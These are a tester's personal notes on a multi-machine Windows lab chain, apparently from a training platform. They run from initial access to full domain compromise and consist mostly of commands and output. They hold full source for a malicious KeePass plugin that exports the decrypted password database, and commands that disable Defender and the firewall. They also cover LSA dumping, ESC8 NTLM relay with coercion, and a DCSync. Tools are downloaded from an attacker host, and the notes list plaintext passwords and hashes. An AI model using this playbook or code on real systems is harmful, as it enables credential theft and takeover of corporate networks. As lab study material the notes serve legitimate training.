Kaiju (Chain)

This is not a writeup, just my notes about the machine.

Machine information

Operating System: Microsoft Windows Server 2022 Standard

Chain: True (3 Machines)

Credentials

Username	Password	Method	Scope
Administrator	NakedMelonMan25	KeePass Malicious DLL	Local Administrator on BERSRV200
clare.frost	atnTYzyew3Ok+d	Dumped via LSA	Domain User

✅ Valid Usernames

Administrator
clare.frost    

🔑 Passwords list

NakedMelonMan25
atnTYzyew3Ok+d

Information Gathering

Nmap Scan

Host is up (0.019s latency).
Not shown: 999 filtered ports
PORT     STATE SERVICE
3389/tcp open  ms-wbt-server

Host is up (0.019s latency).
Not shown: 997 filtered ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
3389/tcp open  ms-wbt-server

Host is up (0.018s latency).
Not shown: 999 filtered ports
PORT     STATE SERVICE
3389/tcp open  ms-wbt-server

Service Enumeration

10.10.170.134

FTP

• FTP anonymous authentication enabled

• Keepass database found it.kdbx

Initial foothold on BERSRV200

During the enumeration the tester found users.xml within FTP service that containing a hash FileZilla's password encrypted using PBKDF2-HMAC-SHA256 and mount point E:\Public indicate the presence of a additional disk.

<password index="1">
    <hash>ZqRNhkBO8d4VYJb0YmF7cJgjECAH43MHdNABkHYjNFU</hash>
    <salt>aec9Yt49edyEvXkZUinmS52UrwNoNNgoM+6rK3fuFFw</salt>
    <iterations>100000</iterations>
</password>

The tester used the format specified in the next thread: https://hashcat.net/forum/thread-7854.html to create the hash format and using 10900 that corresponding to PBKDF2-HMAC-SHA256.

sha256:100000:aec9Yt49edyEvXkZUinmS52UrwNoNNgoM+6rK3fuFFw:ZqRNhkBO8d4VYJb0YmF7cJgjECAH43MHdNABkHYjNFU

Cracking the hash using Hashcat

❯ hashcat -m 10900 hash.txt possible-passwords.txt -r /usr/share/hashcat/rules/best64.rule
<SNIF>
Dictionary cache built:
* Filename..: possible-passwords.txt
* Passwords.: 12
* Bytes.....: 91
* Keyspace..: 924
* Runtime...: 0 secs

sha256:100000:aec9Yt49edyEvXkZUinmS52UrwNoNNgoM+6rK3fuFFw:ZqRNhkBO8d4VYJb0YmF7cJgjECAH43MHdNABkHYjNFU:backup123

Password Found: backup123

❯ ssh backup@10.10.170.134
Microsoft Windows [Version 10.0.20348.2159]
(c) Microsoft Corporation. All rights reserved.

backup@BERSRV200 C:\Users\backup>

Listing the additional disk on BERSRV200

backup@BERSRV200 C:\Users\backup>dir E:\      
 Volume in drive E is Data
 Volume Serial Number is A494-31FF

 Directory of E:\

12/27/2023  03:15 AM    <DIR>          Private
12/27/2023  03:15 AM    <DIR>          Program Files
12/27/2023  03:15 AM    <DIR>          Public
               0 File(s)              0 bytes
               3 Dir(s)   1,960,206,336 bytes free

Retrieving the FileZilla's Administrator password

backup@BERSRV200 E:\Program Files\FileZilla Server>type install.log
<SNIF>
Crypt output: [--admin.password@index=1 --admin.password.hash=mSbrgj1R6oqMMSk4Qk1TuYTchS5r8Yk3Y5vsBgf2tF8 --admin.password.salt=AdRNx7rAs1CEM23S5Zp7NyAQYHcuo2LuevU3pAXKB18 --admin.password.iterations=100000]
<SNIF>

Cracking Administrator's hash

❯ hashcat -m 10900 admin.hash possible-passwords.txt -r /usr/share/hashcat/rules/best64.rule
<SNIF>

Dictionary cache hit:
* Filename..: possible-passwords.txt
* Passwords.: 12
* Bytes.....: 91
* Keyspace..: 924


sha256:100000:AdRNx7rAs1CEM23S5Zp7NyAQYHcuo2LuevU3pAXKB18:mSbrgj1R6oqMMSk4Qk1TuYTchS5r8Yk3Y5vsBgf2tF8:kaiju123

Password: kaiju123

Lateral Movement to sasrv200

Setting up a port forwarding

❯ ssh backup@10.10.130.54 -L 0.0.0.0:14148:localhost:14148

Obtaining Filezilla version

PS E:\Program Files\FileZilla Server> (Get-Item "E:\Program Files\FileZilla Server\filezilla-server.exe").Versioninfo

ProductVersion   FileVersion      FileName
--------------   -----------      --------
1, 8, 0, 0       1, 8, 0, 0       E:\Program Files\FileZilla Server\filezilla-server.exe

Download: https://www.fileeagle.com/software/1788/FileZilla-Server/1.8.0

Connecting to Filezilla Server

Exporting configuration and importing configuration

Due to a bug in FileZilla Server 1.8.0 that prevented users from modifying configurations directly, the tester exported the configuration file, changed the backup's new_native_path attribute to C:\, and reimported it.

<user name="backup" enabled="true">
    <mount_point tvfs_path="/" access="1" native_path="" new_native_path="C:\" recursive="2" flags="0" />
    <rate_limits inbound="unlimited" outbound="unlimited" session_inbound="unlimited" session_outbound="unlimited" />
    <allowed_ips></allowed_ips>
    <disallowed_ips></disallowed_ips>
    <session_open_limits files="unlimited" directories="unlimited" />
    <session_count_limit>unlimited</session_count_limit>
    <description></description>
    <password index="1">
        <hash>ZqRNhkBO8d4VYJb0YmF7cJgjECAH43MHdNABkHYjNFU</hash>
        <salt>aec9Yt49edyEvXkZUinmS52UrwNoNNgoM+6rK3fuFFw</salt>
        <iterations>100000</iterations>
    </password>

Creating and SSH key file for windows

❯ ssh-keygen -t ed25519
Generating public/private ed25519 key pair.
Enter file in which to save the key (/home/Intrusionz3r0/.ssh/id_ed25519): sasrv200
Enter passphrase for "sasrv200" (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in sasrv200
Your public key has been saved in sasrv200.pub
The key fingerprint is:
SHA256:7Hm6WnE/3jTe4JgmwQ0WWRrBwu4OQasqu96LLDP8Gtw Intrusionz3r0@kali
The key's randomart image is:
+--[ED25519 256]--+
|       . .o+.    |
|      . o +o     |
|     . o ...     |
|      o.. o      |
|     . oSo.o     |
|. . . ...+o..    |
|.o E   o+ ..o +  |
|*.=    ..o...O + |
|=@o+. ..o. o+ + .|
+----[SHA256]-----+

Renaming key to authorized_keys

❯ cp sasrv200.pub authorized_keys 

Uploading the file using FTP server to sasrv200/.ssh/

ftp> put authorized_keys 

Connecting via SSH

❯ ssh -i sasrv200 sasrv200@10.10.211.38

Privilege Escalation to Administrator

Discovering and Keepass process running

PS C:\Users\sasrv200\Desktop> while ($true) { Get-Process | ? { $_.ProcessName -like '*keepass*' }; Start-Sleep -Seconds 5 }

Abusing Keepass database via Malicious DLL

Repository: KeeFarceReborn

Code:

using System;
using System.IO;
using System.Windows.Forms;
using KeePass.DataExchange;
using KeePass.Forms;
using KeePass.Plugins;
using KeePassLib.Utility;
using KeePass;
using KeePassLib.Serialization;
using KeePass.App;
using KeePassLib.Keys;
using KeePassLib;

namespace KeeFarceRebornPlugin
{
    public sealed class KeeFarceRebornPluginExt : Plugin
    {
        private IPluginHost m_host = null;

        public override bool Initialize(IPluginHost host)
        {
            if (host == null) return false;
            m_host = host;
            m_host.MainWindow.FileOpened += this.OnFileOpened;
            return true;
        }

        private void OnFileOpened(object sender, FileOpenedEventArgs e)
        {

            var database = m_host.Database;
            var rootGroup = database.RootGroup;

            PwExportInfo pwExportInfo = new PwExportInfo(rootGroup, database);
            FileFormatProvider fileFormat = Program.FileFormatPool.Find("KeePass XML (2.x)");
            string exportFilePath = "C:\\temp\\export.xml";
            IOConnectionInfo iocOutput = IOConnectionInfo.FromPath(exportFilePath);


            if (pwExportInfo == null) return;
            if (pwExportInfo.DataGroup == null) return;
            if (fileFormat == null) return;

            bool bFileReq = fileFormat.RequiresFile;
            if (bFileReq && (iocOutput == null)) return;
            if (bFileReq && (iocOutput.Path.Length == 0)) return;

            PwDatabase pd = pwExportInfo.ContextDatabase;
            if (pd == null) return;
            if (!AppPolicy.Try(AppPolicyId.Export)) return;
            if (!fileFormat.SupportsExport) return;
            if (!fileFormat.TryBeginExport()) return;

            CompositeKey ckOrgMasterKey = null;
            DateTime dtOrgMasterKey = PwDefs.DtDefaultNow;

            PwGroup pgOrgData = pwExportInfo.DataGroup;
            PwGroup pgOrgRoot = ((pd != null) ? pd.RootGroup : null);
            bool bExistedAlready = true;
            bool bResult = false;

            try
            {
                if (bFileReq) bExistedAlready = IOConnection.FileExists(iocOutput);

                Stream s = (bFileReq ? IOConnection.OpenWrite(iocOutput) : null);
                try
                {
                    bResult = fileFormat.Export(pwExportInfo, s, null);
                    
                }
                finally { if (s != null) s.Close(); }

            }
            catch (Exception ex) { MessageService.ShowWarning(ex); }
            finally
            {
                if (ckOrgMasterKey != null)
                {
                    pd.MasterKey = ckOrgMasterKey;
                    pd.MasterKeyChanged = dtOrgMasterKey;
                }
            }

            if (bFileReq && !bResult && !bExistedAlready)
            {
                try { IOConnection.DeleteFile(iocOutput); }
                catch (Exception) { }
            }
            return;
        }
    }
}

File: KeePass.config.xml

<?xml version="1.0" encoding="utf-8"?>
<Configuration xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
	<Meta>
		<PreferUserConfiguration>true</PreferUserConfiguration>
	</Meta>
	<Policy>
    		<Plugins>true</Plugins>
    		<Export>true</Export>
	</Policy>
</Configuration>

To abuse of the malicious plugin

1. Upload KeeFarceRebornPlugin.dll inside E:\Public\Software\KeePass2\Plugins

2. Replace KeePass.config.xml with the new configurations.

3. Waiting a minutes for export.xml is exported into C:\Temp .

PS C:\Temp> type export.xml
<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<KeePassFile>
<SNIF>
<String>
        <Key>Password</Key>
        <Value ProtectInMemory="True">NakedMelonMan25</Value>
</String>
<SNIF>
</KeePassFile>

Disabling real time protection monitoring

PS E:\Public\Software\KeePass2\Plugins> Set-MPPreference -DisableRealTimeMonitoring $true
PS E:\Public\Software\KeePass2\Plugins> (Get-MPComputerStatus).RealTimeProtectionEnabled 
False
PS E:\Public\Software\KeePass2\Plugins> Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False

Dumping LSA using netexec

❯ proxychains nxc smb 10.10.223.214 -u Administrator -p 'NakedMelonMan25' --local-auth --lsa 2>/dev/null
SMB         10.10.223.214   445    BERSRV200        [*] Windows Server 2022 Build 20348 x64 (name:BERSRV200) (domain:BERSRV200) (signing:False) (SMBv1:False)
SMB         10.10.223.214   445    BERSRV200        [+] BERSRV200\Administrator:NakedMelonMan25 (Pwn3d!)
SMB         10.10.223.214   445    BERSRV200        [+] Dumping LSA secrets
SMB         10.10.223.214   445    BERSRV200        KAIJU.VL/sasrv200:$DCC2$10240#sasrv200#44a1583ed4678aa2fba0bd7d13eea30f: (2024-01-30 20:13:30)
SMB         10.10.223.214   445    BERSRV200        KAIJU.VL/Clare.Frost:$DCC2$10240#Clare.Frost#180216e4d0aa40dbf4767dd7ba50f187: (2024-01-21 15:01:24)
SMB         10.10.223.214   445    BERSRV200        KAIJU.VL/Administrator:$DCC2$10240#Administrator#873c4a9511ccfd89537a22fc1cc3ff35: (2024-01-21 15:17:37)
SMB         10.10.223.214   445    BERSRV200        KAIJU\BERSRV200$:aes256-cts-hmac-sha1-96:6133fe5a03272b2913687fc953a7bbbef6f3c13a814f7433592c3ad22296b3ad
SMB         10.10.223.214   445    BERSRV200        KAIJU\BERSRV200$:aes128-cts-hmac-sha1-96:4f20bf429199d4eebccbc116a80532e4
SMB         10.10.223.214   445    BERSRV200        KAIJU\BERSRV200$:des-cbc-md5:dfa48f024a6bbc4c
SMB         10.10.223.214   445    BERSRV200        KAIJU\BERSRV200$:plain_password_hex:6602fb36225eef29799d53ec405d84cb172a6ace527631c7493faba05f7785b8b5c44219caf9dec7143f9662021b24bbd0b629e19d8ec87142eedaa41bb1a4f6841afae9e885b43f37e7a19a1671f67d13c4c4e2fddb68d7fbe15fc5c3c307f1027374ebfc8fd9d542ad566e1bd35735ae24b12f9e1a0f5336aad4cbe5131362b41ce3ecd1c31c4603c0923a07b3b4744aa66556ab19d67a7605459576c886f5b2500a42c1002141371982c1e787d936b0f424115b2dac33bd58d89b27d0d0076e9f43228c2594ce2fe1db60afe827bf0bb7897e74d279faa6c8353b4f020b63e9188343056503342d2e732ab5397422
SMB         10.10.223.214   445    BERSRV200        KAIJU\BERSRV200$:aad3b435b51404eeaad3b435b51404ee:5f3e096d29d5272e756639491122bcd1:::
SMB         10.10.223.214   445    BERSRV200        kaiju.vl\clare.frost:atnTYzyew3Ok+d

Compromise Domain Controller

Discovering a vulnerable templates to ESC8

❯ proxychains certipy-ad find -u clare.frost -p 'atnTYzyew3Ok+d' -dc-ip 10.10.223.213  -vulnerable -stdout 2>/dev/null
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 2 certificate authorities
[*] Found 22 enabled certificate templates
[*] Trying to get CA configuration for 'kaiju-sub-CA' via CSRA
[!] Got error while trying to get CA configuration for 'kaiju-sub-CA' via CSRA: rpc_s_access_denied
[*] Trying to get CA configuration for 'kaiju-sub-CA' via RRP
[*] Got CA configuration for 'kaiju-sub-CA'
[*] Trying to get CA configuration for 'kaiju-CA' via CSRA
[!] Got error while trying to get CA configuration for 'kaiju-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'kaiju-CA' via RRP
[*] Got CA configuration for 'kaiju-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : kaiju-sub-CA
    DNS Name                            : BERSRV105.kaiju.vl
    Certificate Subject                 : CN=kaiju-sub-CA, DC=kaiju, DC=vl
    Certificate Serial Number           : 71000000048715771814C1ABBA000000000004
    Certificate Validity Start          : 2024-01-21 14:57:07+00:00
    Certificate Validity End            : 2026-01-21 15:07:07+00:00
    Web Enrollment                      : Enabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : KAIJU.VL\Administrators
      Access Rights
        ManageCertificates              : KAIJU.VL\Administrators
                                          KAIJU.VL\Domain Admins
                                          KAIJU.VL\Enterprise Admins
        ManageCa                        : KAIJU.VL\Administrators
                                          KAIJU.VL\Domain Admins
                                          KAIJU.VL\Enterprise Admins
        Enroll                          : KAIJU.VL\Authenticated Users
    [!] Vulnerabilities
      ESC8                              : Web Enrollment is enabled and Request Disposition is set to Issue
  1
    CA Name                             : kaiju-CA
    DNS Name                            : BERSRV100.kaiju.vl
    Certificate Subject                 : CN=kaiju-CA, DC=kaiju, DC=vl
    Certificate Serial Number           : 6D6D8A048E2B8C9B4385A113BEEA1F00
    Certificate Validity Start          : 2023-12-17 14:14:04+00:00
    Certificate Validity End            : 2523-12-17 14:24:04+00:00
    Web Enrollment                      : Enabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : KAIJU.VL\Administrators
      Access Rights
        ManageCertificates              : KAIJU.VL\Administrators
                                          KAIJU.VL\Domain Admins
                                          KAIJU.VL\Enterprise Admins
        ManageCa                        : KAIJU.VL\Administrators
                                          KAIJU.VL\Domain Admins
                                          KAIJU.VL\Enterprise Admins
        Enroll                          : KAIJU.VL\Authenticated Users
    [!] Vulnerabilities
      ESC8                              : Web Enrollment is enabled and Request Disposition is set to Issue
Certificate Templates                   : [!] Could not find any certificate templates

The tester faced a problem trying to exploit ESC8 due outbound SMB traffic is blocked by a firewall.

Setting up StreamDivert to redirect the port

Upload the binary and its dependencies.

PS C:\Temp> IWR -URI http://10.8.5.48/config.txt -outfile config.txt
PS C:\Temp> IWR -URI http://10.8.5.48/StreamDivert.exe -outfile StreamDivert.exe 
PS C:\Temp> IWR -URI http://10.8.5.48/StreamDivert.pdb -outfile StreamDivert.pdb
PS C:\Temp> IWR -URI http://10.8.5.48/WinDivert.dll -outfile WinDivert.dll
PS C:\Temp> IWR -URI http://10.8.5.48/WinDivert64.sys -outfile WinDivert64.sys
PS C:\Temp> IWR -URI http://10.8.5.48/WinDivert32.sys -outfile WinDivert32.sys

❯ administrator@BERSRV200 C:\Users\Administrator\Downloads>type config.txt  
tcp < 445 0.0.0.0 -> 127.0.0.1 4455

❯ administrator@BERSRV200 C:\Users\Administrator\Downloads>StreamDivert.exe config.txt -f -v 

Setting up the port forwarding using SSH

❯ ssh administrator@10.10.231.22 -R 4455:127.0.0.1:445

Setting up the ntlmrelayx

❯ proxychains impacket-ntlmrelayx -t http://BERSRV105.kaiju.vl/certsrv/certfnsh.asp -smb2support --adcs --template 'DomainController' --no-http 2>/dev/null

Coercing the authentication

❯ proxychains -q python3 dfscoerce.py -u clare.frost -p 'atnTYzyew3Ok+d' -d 'kaiju.vl' BERSRV200 kaiju.vl

Output of ntlmrelayx:

[*] SMBD-Thread-4 (process_request_thread): Received connection from 127.0.0.1, attacking target http://BERSRV105.kaiju.vl
[*] HTTP server returned error code 200, treating as a successful login
[*] Authenticating against http://BERSRV105.kaiju.vl as KAIJU/BERSRV100$ SUCCEED
[*] Generating CSR...
[*] CSR generated!
[*] Getting certificate...
[*] GOT CERTIFICATE! ID 7
[*] Writing PKCS#12 certificate to ./BERSRV100$.pfx
[*] Certificate successfully written to file
[*] SMBD-Thread-6 (process_request_thread): Received connection from 127.0.0.1, attacking target http://BERSRV105.kaiju.vl
[*] HTTP server returned error code 200, treating as a successful login
[*] Authenticating against http://BERSRV105.kaiju.vl as KAIJU/BERSRV100$ SUCCEED
[*] Skipping user BERSRV100$ since attack was already performed

Retrieving NT Hash for Domain Controller

❯ proxychains certipy-ad auth -pfx dc.pfx 2>/dev/null
[*] Using principal: bersrv100$@kaiju.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'bersrv100.ccache'
[*] Trying to retrieve NT hash for 'bersrv100$'
[*] Got hash for 'bersrv100$@kaiju.vl': aad3b435b51404eeaad3b435b51404ee:82bea846cd5a029773b9ea9d2fe33c1c

Performing DCSync Attack

❯ export KRB5CCNAME='bersrv100.ccache'
❯ proxychains impacket-secretsdump -k -no-pass BERSRV100.kaiju.vl -just-dc 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0b46720476be1abfbb3282cb80054f40:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:e97467587cb5f64e221bdb985b6c2cb0:::
kaiju.vl\sasrv200:1104:aad3b435b51404eeaad3b435b51404ee:0049f304fb42d8b5b7336384d94ef5fa:::
<SNIF>

Authenticating on BERSRV100

❯ proxychains evil-winrm -i BERSRV100 -u 'Administrator' -H 0b46720476be1abfbb3282cb80054f40 2>/dev/null
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
kaiju\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents>